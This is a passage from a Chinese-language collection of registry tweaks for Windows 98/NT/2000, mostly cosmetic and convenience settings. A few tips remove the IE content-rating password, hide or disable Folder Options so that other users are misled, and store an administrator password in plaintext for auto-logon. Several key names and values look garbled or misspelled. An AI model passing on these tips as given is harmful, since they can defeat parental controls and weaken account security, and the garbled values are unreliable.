\Software。这几项里面的内容基本上一致,在其中一处作查找删除就行了。比较常用到的方法是进入HKEY_LOCAL_MACHINE\Software分支中,然后重点查找那些已经确信被安全卸载了的软件的残留信息,在确认无误后删除。
24 恢复CD Key
如果你不小心将Windows的CDKey丢失了,担心在以后需要安装系统时会遇到什么麻烦。我该如何才能找回它呢?您可以从NT的注册表中找到这个CDKey。打开注册表,然后再找到“HKEY_LOCAL_MACHINE\SOFTWARE\Microso WindowsNT\CurrentVersion”位置,在右侧的ProductId键值中,就包含了CDKey的信息,另外,如果您所使用的NT是OEM版本,则有可能整个ProductId的串值就是CDKey!
25 加入登录信息
因为加入这样的功能需要修改NT的注册表,所以请您小心并做好备份。首先在注册表中的找到HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Winlogon子键,然后在窗口右边找到“LegalNoticeCaption”和“LegalNoticeText”两个键值。如果没有, 请添加这两个键值。然后在这两个键值内分别输入“这是我的服务器”、“欢迎光临!”。关闭注册表,重启机器,这次您就看到在登录窗口之前,将会出现一个新的窗口,包含上面您所输入的这两条信息。
26 防范非法入侵
介绍如何防止本地用户非法入侵 Windows NT 系统的文章已经并不少见,但如何防范远程用户呢?当然,一般的做法是,可以在用户拨号进入系统(或通过局域网进入系统)时限制其对文件的访问权限,以达到保护文件的目的。但毕竟这种安全级别不够高,如何能将这些用户锁在系统的门外,以达到绝对安全的目的呢?NT为驱动器和系统目录创建默认共享的目的,是为了使系统管理员、备份程序和其他授权用户及服务性工作能顺利访问其他个人用户的文件。当其他用户访问您的系统时这些共享对象并不显现出来。但是任何一个远程 用户只要知道这些共享对象的确切名称,并且有访问权的话,他就可以与这些共享对象建立连接。令人遗憾的是,NT系统的安全机制非常脆弱。虽然SecurityPack5的出台为老用户提高到管理员水平而提供了一些补漏措施,并且还 有一些NT的安全检查方法,但仍然还会有其他漏洞存在。所以如果您的计算机在局域网上,或者是通过Modem连接 上网的,那么可通过取消这些组件的共享来保护数据。 为了达到此目的,打开NT的注册表编辑器。在注册表编辑 器中,将当前目录定位在HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\lanmanagerserver\parameters,如果没有AutoShareWks键值名,那么请你新建立一个;然后再双击它并输入“3D0”,最后单 “确定”按钮、关闭注册表编辑器,然后重新启动计算机。
27 ICQ中有“漏洞”
ICQ是由以色列一家叫Mirabilis的公司出品的网络软件,其作用是为Internet上的用户提供实时的信息传递服务。有了它,你就可以同千里之外的朋友交流信息,还可以在对方不在线的情况下“呼叫” 他(她)上线,难怪广大网友都亲切地叫它“网络寻呼机”。但是,你是否知道在ICQ for Windows版本中 有一个“漏洞”。ICQ在Windows注册表中有一个键值被称为“Auto Update”(自动更新)。如果该键值被设 置成“Yes”,那么每一次登录到服务器的时候,就会将你的计算机中一些重要信息发送到登录的服务器上。 这些信息包括:你正在使用的操作系统类型、版本、序列号、用户登记名称、公司名称、所使用的浏览器版本等等。这些重要信息的发送可能会被黑客或某些别有心的人所利用,给你带来不必要的麻烦。为了避免此问题的发生可采用修改注册表关掉ICQ的“自动更新”功能。首先在注册表内找到 HKEY_CURRENT_USER\Software\Mirabilis\ICQ\DefaultPrefs位置,并在窗口右边找到“Auto Update”键值; 将“Auto Update”键值由“Yes”修改为“No”即可。为了你系统的稳定性,在进行修改时请注意要在关闭ICQ 应用程序的情况下进行修改。修改完毕后,请重新启动计算机。
28 增加执行文件路径
如果需要运行的程序不在指定的目录中,则DOS系统一般采用在自动批处理文件中设置路径的方法来达到自动寻找此程序的目的;在Windows中则可以更秘密地增加程序路径,而不是通过设置自动批处理的方式,这就需要通过修改注册表来实现上述目的。 比如要为“C:\ProgramFiles\pdoc\pdoc.exe”文件增加路径。先打开注册表,然后找到HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths的位置,在窗口右边新建一个名为“pdoc.exe”的主键,选择该主键,将其默认值设为“C:\ProgramFiles\pdoc\pdoc.exe”;再新建名为“Path”的主键,将其设为“C:\ProgramFiles\pdoc”。这样就可以通过在“运行”命令行中键入“pdoc.exe” 或“pdoc”来运行该程序了。另外你还可以为已经存在的程序设置新的主键,比如可以为MicrosoftWord 97添加名称为“Word.exe”的主键。假设Word 97安装在“C:\ProgramFiles\MicrosoftOffice\Office\”目录中,则其操作为:打开注册表,在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\AppPaths”,新建名称为“Word.exe”主键,选择该主键,将其默认值设为“C:\ProgramFiles\MicrosoftOffice\Office\Winword.exe”即可,建立执行目录的方法与上例一样。
29 更改系统安装目录
如果使用光盘安装Windows,当添加新的硬件时,系统配置驱动程序时会提醒需要在光驱中插入Win 98光盘,而且每次都 要这样做,的确太麻烦了。您可以将Win 98安装盘中的所有“*.CAB”文件都拷贝到硬盘的某个目录下,比如“D:\Backup\PWin98”,然后运行注册表编辑器,在“我的电脑”文件夹中依次选择“HKEY_LOCAL_MACHINE”、“Software”、“Microsoft”、“Windows”、“CurrentVersion”、“Setup”,将“SourcePath”主键的值改为“D:\Backup\PWin98\”,
重新启动计算机即可。 如果网络上有一个文件服务器,假定Win98安装盘备份在“D:\Backup\PWin98\”目录中,文件服务器的机器名为“MMX233”,D盘共 享名为“DiskD”,则将“SourcePath”主键值改为“\\MMX233\DiskD\Backup\PWin98\”,注销用户或重新启动Windows即可。
30 去掉IE内的分级审查口令
首先找到在注册表的HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Currentversion\Policies\Ratings位置,这里保存的是IE下“Internet属性”对话框的“内容”选项页中的“分级审查”中的口令,该口令是经过加密的,在下图中你可以看到记录该口令的有两个键值,而二进制的“key”键值则是加过密的,去掉口令的方法即是将子键下的这两个键值删除,如果没有口令,这个子键无键值。下次进入IE,你就可以安全地进入分级审查,并且可以直接跳过输入“旧密码”,直接加入密码即可.
31 设置中文Windows内的系统语言
如果你安装了一个英文游戏,并且不支持中文,例如QUAKE。就可以将中文Windows内的汉字按照英文一样来处理。比如每个汉字都被当成了两个字符来处理,删掉一个汉字也需要按两下删除键,而且每到行末,就会出现汉字丢掉一半的奇怪现象。如果遇到这样的情况,千万别着急重新安装Windwos,你还可以先试一试下面的方法。首先在注册找到HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\Nls\Locale的位置,将原来的“00000804”改为默认的“00000409”(系统默认使用的语言系统).
32 更改IE标题栏中的文字
首先在注册表中找到下面的位置HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main,然后再新建一个字符串值,将其命名为Window Title
(注意两个词中间有一个空格).
33 如何删除多余的DLL文件
在WIN98的System子目录下存有大量的DLL文件,这些文件可能被系统或应用程序共享。但是由于经常安装和卸载软件,就会在System目录下留下一些DLL垃圾文件。它们不但占用了硬盘空间,而且还降低系统的运行速度。删除它们的步骤如下:
1.运行“REGEDIT”, 打开注册表编辑器。
2.打开
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\SharedDLLs分支。
这里SharedDLLs子键记录的就是有关程序共享的DLL信息,每个DLL文件的键值说明它已被几个应用程序共享。如果是二进制键值为“00 00 00 00”,则表明不被任何程序共享。(另外“0x00000001 (1)”是十六进制表示法)
3.System目录中删除对应的文件。
34 去掉桌面快捷方式的小箭头
在一些程序的安装过程中,会自动在桌面上创建该程序的快捷方式,方便了我们的使用。但是那个小箭头不太好看。我们可以利用修改注册表来去掉它。首先要注意此快捷方式是什么类型的,一般说来以.LNK居多,也有一些是.PIF(指向MS-DOS程序的快捷方式)。具体步骤如下:
1.运行注册表编辑器,打开HKEY_CLASSES_ROOT\lnkfile分支。
2.在lnkfile子键下面找到一个名为“IsShortcut”的键值,它表示在桌面的.LNK快捷方式图标上将出现一个小箭头。右键单击“IsShortcut”,然后从弹出的菜单中选择“删除”,将该键值删除。
3.关闭注册表编辑器,重新启动Win98,就可发现快捷方式图标上已经没有小箭头了。
同理,对指向MS-DOS程序的快捷方式(即.PIF)图标上的小箭头,则除了是打开HKEY_CLASSES_ROOT\piffile分支外,其余同上。
35 让Windows字体更平滑
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Control Panel\Desktop主键,双击右侧窗口中的“FontSmoothing”,将其值设为“2”(注意:不是“1”)即可激活平滑显示字体,若设为“0”则禁止平滑显示
重启计算机生效。
36 给当前文件或文件夹换换颜色
适用于:win2000操作系统
方法: 打开HKEY_CURRENT_USER\Control Panel\Colors主键,双击右侧窗口中的“HOT TrackingColor”字符串值,用户可以输入代表某种颜色的数值比如红色是“255 0 0”、蓝色是“0 0 255”。
37 改变窗口变化时的动感效果
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Control Panel\Desktop,在右窗口空白处新建一个字符串值,命令为“Minanimate”并在其键值数据文本框中输入“0”。
重启计算机,就可以发觉当用户最小化某个窗口或者在任务栏上单击窗口恢复正常或最大状态时,窗口就会立即出现在屏幕上,没有视觉变化过程。
38 给Windows改名
适用于:win98操作系统
方法: 打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion主键,修改右窗口中的“Version”的值改为你想要的名字即可。
关闭注册表,再点击“我的电脑”中的“帮助”、“关于Windows 98”变会发现以前的“Windows 98”已变成了你改的那个名字了。
39 在“开始”菜单中添加分隔线
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer,在右侧的窗口中新建一个双字节值,命名为“EditLevel”。 双击“EditLevel”,输入“1”(取消分隔线)或者“0”(增加分隔线)。
40 改变“超级链接”处点击前后的颜色
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings,在右边的窗口中修改“Anchor Color”和“Anchor C
olor Visited”的值即可修改点击前后的颜色。
41 隐藏桌面的IE图标
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer主键,在右侧的窗口中新建或者修改双字节值“NoInternetIcon”,输入“1”则隐藏IE的图标,“0”则显示该图标。
重启计算机。
42 改变桌面图标的大小
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_CURRENT_USER\Control Panel\Desktop\WindowMetrics子键,新建字符串值“Shell Icon Size”,用户可以根据自己的需要输入图标大小的象素值(默认的值为32)。
重启计算机。
43 在磁盘整理前自动关闭屏保程序
适用于:win98操作系统
方法: 打开HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Applets,新建子键Defrag,在其下再新建一个子键Settings,然后在右边窗口中新建一个字符串值,命名为“DisableScreenSaver”,将其值设置为“YES”即可。
44 在登录对话框中增加关机功能
适用于:win2000操作系统
方法: 打开HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon子键,双击右边窗口中的“ShutdownWithoutLogon”,在“数值数据”中将值设置为1。
重启计算机,登录信息对话框中的“关闭计算机”按钮即可启用。
45 设置在右键菜单中添加“快速查看”命令
适用于:win98操作系统
方法: 打开HKEY_CLASSES_ROOT*子项,在右边窗口中新建一个子键,将其名称设置为“快速查看”,双击子键的“默认”选项,在“数值数据”中输入“*”,修改后立即生效。
46 关机时自动删除交换文件
适用于:win2000操作系统
方法: 打开HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Session Manager\Memory Management子键,双击右边窗口中的“ClearPageFileAtShutDown”,将“数值数据”设为1,现在在关闭系统时就会自动删除Pagefile.sys文件了。
47 加快程序运行速度
适用于:win98、 winMe、winNT、win2000、winXP操作系统
方法: 打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem子键,点击右侧窗口,在“编辑”菜单中选择“新建”-- “双字节值”,命名为“ConfigFileAllocSize”,将其值设置为“1F4”,即十进制的500即可。
48 禁止使用长文件名
适用于:winNT、win2000操作系统
方法: 打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\FileSystem子项,双击右侧窗口中的Win31FileSystem,将数值设为1,则系统将禁止使用长文件名。
49 发送系统崩溃信息给系统管理员
适用于:winNT、win2000操作系统
方法: 打开HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\CrashControl子键,双击右侧窗口中的SendAlert,将数值设为1。则系统崩溃时即向管理员发送警告信息。
50 禁止名称有“快捷方式”四个字
适用于:win98、 winMe、win2000、winXP操作系统
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer
在右边的窗口中新建一个二进制值“link”,并设其值为“00 00 00 00”。
修改注册表,完善你的系统
1.在“新建”菜单中添加新的文件类型
在Windows系统中为了方便用户能够快速创建一个新文件,在快捷菜单的“新建”菜单中提供了许多内置的新的文件类型,如提供了“WinZip文件”、“文本文档”、“Microsoft Word文档”、“BMP图像”、“声音文件”、“其他Office文档”、“Adobe PhotoShop Image”等等文件类型的新文件的创建操作。但是,因为每个人使用计算机用途的差别,有时我们需要大量的使用其他文件格式,为了方便我们需要添加自己的文件格式的创建操作。假定我们创建了一个.pdf文件类型,然后将此文件类型添加到“新建”菜单中,下面为增加步骤。
首先使用“附件”组中的“记事本”程序输入如下一段文本,并且将此段文本保存为pdf.reg。
REGEDIT4
[HKEY_CLASSES_ROOT\.pdf]
@="pdfFile"
[HKEY_CLASSES_ROOT\pdfFile]
@="pdf文件"
[HKEY_CLASSES_ROOT\pdfFile\shell]
[HKEY_CLASSES_ROOT\pdfFile\shell\open]
[HKEY_CLASSES_ROOT\pdfFile\shell\open\command]
@="\"C:\\Windows\\NotePad.EXE\" \"%1\""
[HKEY_CLASSES_ROOT\pdfFile\shell\print]
[HKEY_CLASSES_ROOT\pdfFile\shell\print\command]
@="\"C:\\Windows\\Notepad.EXE\" /p \"%1\""
[HKEY_CLASSES_ROOT\pdfFile\shell\printto]
[HKEY_CLASSES_ROOT\pdfFile\shell\printto\command]
@="\"C:\\Windows\\Notepad.EXE\" \"%1\" \"%2\" \"%3\" \"%4\""
[HKEY_CLASSES_ROOT\pdfFile\DefaultIcon]
@="C:\\ Windows\\Notepad.EXE ,1"
[HKEY_CLASSES_ROOT\pdfFile\Insertable]
@=""
[HKEY_CLASSES_ROOT\pdfFile\protocol]
[HKEY_CLASSES_ROOT\pdfFile\protocol\StdFileEditing]
[HKEY_CLASSES_ROOT\pdfFile\protocol\StdFileEditing\verb]
[HKEY_CLASSES_ROOT\pdfFile\protocol\StdFileEditing\verb\0]
@="编辑(&E)"
[HKEY_CLASSES_ROOT\pdfFile\protocol\StdFileEditing\server]
@="C:\\ Windows\\Notepad.EXE "
然后启动注册表编辑器,从“注册表”文件中选择“引入注册表文件”,然后输入pdf.reg文件,则将此文件引人到注册表中,此时,.pdf文件扩展名已经添加到HKEY_CLASSES_ROOT根键下,然后打开HKEY_CLASSES_ROOT\.pdf分支,然后在此分支下添加一个“ShellNew”子键,在“ShellNew”子键中添加一个名为“NullFile”的空串。关闭注册表编辑器,重新启动计算机就可以的了!打开“新建”菜单,我们发现,在“新建”菜单中将添加一个名为“pdf文件”的选项。
2.通过注册表修改Windows 98的系统设置
打开HKEY_CURREN T_USER\Software\Microsoft\Windows\CurrentVesion\,会看到一些子文件夹,这里就是当前的一些系统设置,让我们修改一些文件夹以实现特殊的功能:
①ProductKey就是安装Windows 95/windows 98时的注册码。
②在我们安装很多微软公司的软件和其他一些软件时会发现系统已经默认了一个用户和用户单位,这个默认值是在安装Windows95/98时输入的,如果想要修改这个用户设置只要更改右边的RegisteredOwner和Registered Organization的值。值的类型是字符串。
③在此文件夹下也有Run子文件夹,功能与前面提到的功能1中的Run功能相同,也是用来在系统启动时运行一些程序,对于不需要启动运行的程序可以删除。
④RunServices子文件夹,这些文件夹内的项目是指当将windows95/98作为服务来运行的程序,这些程序也是在开机启动时作为服务来运行的,如微软的Persional Web Server、Wingate等小型服务器软 件。一般不必去动它们,以免不必要的麻烦。
3.为一台机器设置两个IP地址
一般情况下只能为一个网络适配器绑定一个IP地址,但通过修改系统注册表,却可以为一个网卡绑定多个IP地址:打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Class\NetTrans目录分支,在此目录中可以看到多个名为0000、0001、0002…的目录,它们用于记录协议的安装情况。在它们中间找到DriverDesc为"TCP/IP"的目录,修改IPAddress和IPMask两个键。其中IPAddress为用逗号隔开的多个IP地址,IPMask是对应的掩码。例如设置IPAddress为"192.168.0.3,192.168.0.5",IPMask为"255.255.255.0,255.255.255.0"时,表示为系统设置了两个IP地址192.168.0.3 和192.168.0.5。
4.查看注册表、认识AutoRun原理
众所周知,在一台运行Windows95/98或WindowsNT4.0以上版本的计算机中,只要在光驱中放一张CD盘,一张软件光盘,它上面的一些程序就会自动执行,这个程序也许就是这个软件的安装程序,也许是这张光盘的内容介绍。这还是在使用上给我们带来了许多方便,那么系统到底是如何实现这种功能呢?
其实在Windows9x的文件系统核心部分有一个叫"卷跟踪"的虚拟设备驱动程序(VxD),它负责监视软盘、CD-ROM等可移动介质是否会改变。如果这些介质上的文件在被打开以后还没有关闭就取走这些介质,卷跟踪程序就会检测到这一点,立即向用户发出警告,要求用户插入原盘。当用户将光盘放入CD-ROM驱动器时,"卷跟踪" 虚拟设备驱动程序就会自动检测光盘的类型,如果是CD盘,系统就会自动调出 CD Player来播放CD;如系统检测到光盘具有PC文件系统,系统就会继续检测光盘上是否具有AutoRun.inf文件,该文件指定了AutoPlay运行的程序。通过在autorun.inf中指定文件,你可以运行光盘上的任何应用程序,当然最典型的应用程序还是应用软件的启动和安装功能。
所有的Inf文件的内容都是ASCII文本,用来为Setup程序提供安装信息,在Windows\system 目录下就有很多inf文件。Inf文件像INI文件一样分成许多节,且内容也很多。但是AutoRun.inf文件则比较简单,只有[autorun]一节,在这一节中最基本的命令就是open,用它来指示Windows9x系统自动运行哪个程序,如果文件是:
[AUTORUN]
open=setup.exe
Windows9x系统在插入光盘时就会自动执行setup.exe这个应用程序,open命令指出自动运行的程序的路径和文件名。另外一个常用的命令就是icon,为光盘指定一个图标的文件名,格式为:icon=文件名,其中文件名可以指定一个图标、一个位图、一个可执行文件甚至一个动态链接库,如果指定的文件中包含不止一个图标资源,可以在文件名中加一个数字(即索引值,从"0"开始)表示第几个图标,文件名和数字之间用","分开。一旦为光盘指定图标后,在"资源管理器"和"我的电脑"中,光盘的图标都将变成你指定的这个图标。例如:icon=pname.exe,3,即使用pname.exe 文件中的第4个图标作为光盘驱动器的图标。
如果在光盘上的根目录下有autorun.inf文件,那么Windows9x还会在光盘图标的右键快捷菜单中添加一个AutoPlay缺省选项。如果你使用的是Windows9x的中文版,在弹出的快捷菜单中显示则是"自动播放"选项,这样即使在"自动插入通告"设置被关闭的情况下,只要光驱中放有带autorun.inf文件的光盘,双击光驱图标就能执行open命令指定的应用程序。
除了open和icon命令之外,在autorun.inf文件中还可以使用shell命令,用来向光盘图标的弹出菜单中添加更多的自定义菜单项。下面的两行语句为快捷菜单中添加了Demo选项,并且为菜单项设置快捷键"D":
shell\verb\command=pname.exe
shell\verb=&Demo
其中,第一行定义了verb的动作,第二行指明了执行动作的菜单选项,这个动词"verb"可由光盘生产者自己指定,但一定要保证前后定义的一致性和命令的完整性。在一般情况下,自动播放(AutoPlay)是弹出菜单的缺省选项,你也可以用shell命令将AutoPlay命令更改为特殊的命令。 其实,只要你明白了这个系统的原理,你就能猜出,自动运行(autoplay)不仅可以在光盘上实现也可以在软盘、硬盘甚至虚拟盘和网络驱动器上实现。但是这得修改windows95注册表的有关信息才能实现。 HKEY_CURRENT_USER/SoftWare/Microsoft/windows/currentverson/ picilies/explorer 的键值NoDriveTypeAutoRun是一个四个二进制数据组成的键值,其中第一个字节表示哪些驱动器的自动播放(Autoplay)有效,下表就是这一字节的8位二进制数的具体含义。(注:二进制数为0时有效,为1时无效。)
位 位屏蔽常数 含义
0(低位) DRIVE_UNKNOWN 不识别的驱动器类型
1 DRIVE_NO_ROOT_DIR 根目录不存在
2 DRIVE_REMOVEABLE 软盘
3 DRIVE_FIXED 硬盘
4 DRIVE_REMOTE 网络驱动器
5 DRIVE_CDROM CD_ROM
6 DRIVE_RAMDISK 虚拟盘
7(高位) 保留
所以,你只要修改其中的某一位,就能使对应的驱动器AutoPlay有效。
你想对你的软盘实行自动运行吗?那就来吧:
在注册表编辑器中查找"NoDriveTypeAutoRun",单击查找下一个,在找到的"NoDriveTypeAutoRun"上双击,将其值由0000 95 00 00 00 (系统的缺省二进制值)更改为0000 91 00 00 00确定以后,退出注册表编辑器,重新启动计算机 以后,使更改生效。在你的软盘根目录下,存放一个Autorun.inf文件,将open和icon命令各指向一个存在的文件,双击"我的电脑"或"资源管理器"中的软盘驱动器图标,看一看效果如何?
由面的表格可以看出,系统的缺省设置是光驱、硬盘虚拟盘的自动播放有效。所以你想要屏蔽所有的驱动器的自动播放功能,只要将"NoDriveTypeAutoRun"的值改为0000 FF 00 00 00 就行了。
AutoPlay的确给我们带来了许多方便,我们可以利用它的这一特性使我们的硬盘、软盘、虚拟盘及网络盘在"资源管理器"和"我的电脑"中有不同的表现,最大限度地方便我们的使用。
修改注册表使电脑更个性化
1.改变“我的电脑”的打开方式(for win98)
我们双击“我的电脑”的时候,缺省的打开方式是一般的窗口方式,你每点下一个目录都会新开一个窗口很麻烦,我们可以修改注册表,使计算机按照我们喜欢的方式打开“我的电脑”。
打开 \\HKEY_LOCAL_MACHINE\SOFTWARE\Classes\目录找到 CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D},在shell下新建主键Open,再在Open下建立主键command,修改它右边的默认键值为“Explorer.exe”,这样你就可用资源管理器打开“我的电脑”。
如果你是个念旧的人,喜欢win32那样的打开文件管理器方式,那你把默认键值修改为“WinFile.exe”,就可用文件管理器打开“我的电脑”。
当然你也可以用其它程序来打开“我的电脑”,只需在该主键下进行修改即可,如将默认键值改为“D:\Wintools\ACDSee32\ ACDSee32.exe”,那么,当你双击桌面上“我的电脑”的图标时,就会启用ACDSee32来打开“我的电脑”。但你别告诉我你想用photoshop来打开你的电脑,那没什么好玩的!
2.增强IE中的网址自动匹配、探测查找功能
我们都知道在IE的地址栏中输入地址的时候,IE有自动匹配功能,(我们是不用输入前面的
http://www,这是默认的协议和文件传输方式)。在我们输入CPCW后,IE会自动将地址补全为
http://www.cpcw.com,但IE缺省的只能对.com进行匹配,如果我要找pchome.net怎么办呢?
如果要使IE能对.net、.edu、.org、等等后缀具有自动探测功能,打开HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Mail\UrlTenplate中新建三个名为“2”、“3”、“4”的字符串值,并分别更改键值为“
www.%s.org”、“
www.%s.net”、“
www.%s.edu”就可以的了,如果你还要加多的,按照这样的格式就行的了,什么.mil等等啊。
3.让“资源管理器”等窗口也可以自动刷新
我们每次在“资源管理器”和“文件夹”等窗口添加一个文件夹或新添一个文件或者文件的转移的时候,必须要按键,才能对窗口进行刷新。通过修改注册表可以达到窗口自动刷新的目的。
打开HKEY_LOCAL_MACHINE\SYSTEM\CURRENTCONTROLSET\CONTROL\UPDATE,修改 "UPDATEMODE"值,由"1"改为"0",这样窗口就能做到自动刷新了。
5.在“资源管理器”窗口中显示 BMP 图像 的略图
Windows 98系统中有很多 BMP 图像,为了找一个个所需要的 BMP 图像,不得不打开这些图像来查找(而一般的gif和jpg都有略图方式的)。为了节余时间,我们可以让它们直接在窗口中显示为略图。
打开 HKEY_CLASSES_ROOT\Paint.Picture\DefaultIcon ,把“默认”键值的参数“ 1 ”改为“ %1 ”。单击“确定”,然后你需要重启计算机,这样你就可以看到BMP图象的略图了。
6.使拨号网络可以储存密码
在打开拨号网络连接项时,有的系统的“保存口令”一栏的小方格是以灰色显示,意味着你不能打勾储存密码,对于家庭用户是很讨厌的,用注册表吧:
打开 HKEY_LOCAL_MACHINE/SOFTWARE/Microsoft/Windows/CurrentVersion/Network /RealModeNet。 如果你能找到右面的autologon的数值是“00”,双击鼠标把数值改为 “01 00 00 00 00”,再重新启动Windows就好了。如果找不到autologon这个值,新建这个键值,类型为“Dword”, 把值设为“1”(若为“0”则就是灰色方格了),再重新启动电脑就一切OK了。
7、隐藏‘文件夹选项’里的‘显示所有文件和文件夹’
其实,还有更绝的办法,让我们来进行一个实验:运行“regedit”启动注册表编辑器,打开KEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL,为安全起见,请先将该分支导出,然后删除SHOWALL分支,重新打开“高级设置”窗口,你就再也找不到“显示所有文件和文件夹”选项,自然他人想修改也无从下手了!
对注册表有一定了解的朋友很快就能明白其中的奥秘:原来“文件夹选项”中的所有设置都保存在注册表的...\Advanced\(同上)分支中。只要在注册表中做一点手脚,“文件夹选项”对话框就掌握在你手中了!
以Windows 98为例,Folder主键下的8个主键分别对应“高级设置”窗口中“文件和文件夹”下的8个选项,Visual下的3个主键则分别对应“可视设置”下的3个选项。具体对应哪个选项,只要在注册表编辑器窗口右格中查看各主键名称和主键对应的“Text”的键值就可明白(如图2)。
例如,SHOWALL主键对应的“Text”的键值为“显示所有文件”,说明SHOWALL主键对应“高级设置”窗口中的“显示所有文件”选项。因此,当我们删除此SHOWALL分支后,就再也找不到此选项,哪怕叫“芝麻开门”也不管用了。
为了让他人无法修改“高级设置”中某个文件夹选项,我们可以采用两种方法实现:
1) 让选项“消失”
如上所述,只要将选项对应的主键分支删除,该选项便不会显示出来。例如,删除HideFileExt分支即可关闭“隐藏已知文件类型的扩展名”选项不显示。如果没备份的话,删除分支后要恢复就比较麻烦了。其实有一个更简单的办法可以关闭选项:找到对应的主键下键名为“Type”的二进制键值,双击修改它的键值,在其原键值后加上任意一个数字即可关闭该选项。例如,将SHOWALL主键下的“Type”的键值由原来的“radio”改为“radio2”后,对应的“显示所有文件”选项就不显示了。这样以后要恢复显示时,只需将“radio2”改回为“radio”即可。
2) 让修改“无效”
选项不出现在对话框中,难免引起怀疑。要是让修改不起作用,则往往可迷惑住他人。在每一个具体选项对应的主键下,都有一个名称为“CheckedValue”二进制键值,将其键值修改为“0”时,他人对任何选项的修改都不会生效(注意:如果主键对应的是复选框选项,则该主键下还可找到“UncheckedValue”键值,请检查其值是否为“0”,如不是,先改为“0”)。
例如,先在“高级设置”中取消对“显示所有文件”选项的复选,然后将SHOWALL分支下“CheckedValue”的键值改为“0”,则不管在对话框中如何设置,在资源管理器都不会显示隐藏文件,从而让你的文件隐藏得更可靠。当然,只要将“CheckedValue”的键值改回为“1”,对对应选项的修改又可立即生效了。
巧用NT注册表
一、更改登录时的背景图案
通过以下步骤可更改在启动屏幕上出现“开始登录”,并要求按“Ctrl+Alt+Delete”键登录时出现的背景图案。
(1)编辑背景图形文件,如C:\DOS\PAPER.BMP;
(2)执行“开始/运行”命令,在“运行”对话框中输入REGEDIT32.EXE,运行注册表编辑器(因修改注册表可能导致系统无法运行,故注册表编辑器未出现在任何菜单中);
(3)定位于HKEY-USERS\DEFAULT\Control\Desktop,双击右方的“Wallpaper”数值名称,在出现的“字符串编辑器”对话框中的“字符串”文本框中输入图形文件名称,如:C:\DOS\PAPER.BMP;
(4)双击右方的“TileWallpaper”数值名称,并在“字符串”文本框中输入一个非零的数值,如:1。
二、不显示上次登录的用户名
在按“Ctrl+Alt+Delete”。键登录时,系统会在“用户名”文本框中显示上次登录的用户名,通过如下步骤可使系统在登录时不显示这一信息。
(1)运行注册表编辑器,定位于HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\WindowsNT\Current Version\WinLogon;
(2)选择“编辑"菜单中的“添加数值”,在“数值名称”文本框中输入“DontDisplayLastUsreName”,选择数据类型为REG-SZ;
(3)双击刚添加的数值名称,将值设为1。
三、定义启动窗口信息
有时在系统启动时,当用户按下“Ctrl+Alt+Delete”键登录时,会希望用户看到一些信息,如显示一个窗口标题为“you are welcome"的窗口,窗口中显示“欢迎您”。
(1)运行注册表编辑器,定位于HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\W owsNT\Current Version\WinLogon;
(2)双击右方的“LegalNoticeCaption”数值名称,在“字符串"文本框中输入窗口标题:you are welcome;
(3)双击右方的“LegalNoticeText”数值名称,在“字符串”文本框中输入窗口中要显示的内容:欢迎您。
四、不登录就可关闭系统
在Windows NT Workstation4.0的登录窗口中的“关闭系统”按钮,使用户可不登录就关闭系统,而在Windows NT Server4.0的登录窗口中虽然也有“关闭系统”按钮,但按钮不可用(灰色的)。可通过以下步骤,使用户能使用此按钮的功能。
(1)运行注册表编辑器,定位于HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\WindowsNT\Current Version\WinLogon;
(2)双击右方的“ShutdownWithoutLogon”数值名称,将其值由0改为1。
五、自动登录
在Windows NT中可实现不需手工输入用户名及密码就能自动以某一用户名登录某一域的功能。
(1)运行注册表编辑器,定位于HKEY-LOCAL-MACHINE\SOFTWARE\Microsoft\WindowsNT\Current Version\WinLogon;
(2)选择“编辑”菜单中的“添加数值”,在“数值名称”文本框中输入“AutoAdminLogon”,选择数据类型为REG-SZ;
(3)双击刚添加的数值名称,将其值设为1;
(4)双击“DefaultDominName”数值名称,在“字符串”文本框中输入要登录的域名,如:DOADMIN;
(5)双击“DefaultUserName”数值名称,在“字符串”文本框中输入要登录到此域的用户,如:ADMINISTRATOR;
(6)选择“编辑”菜单中的“添加数值”,在“数值名称”文本框中输入“DefaultPassword”,选择数据类型为REG-SZ;
(7)双击刚添加的数值名称,在“字符串”文本框中输入此用户的登录密码。
下次登录时,如按住Shift键就会出现输入用户名及密码的对话框,否则系统自动以此用户名登录。如果要取消自动登录功能,只要仍定位到此处,将AutoAdminLogon键值设为0即可。
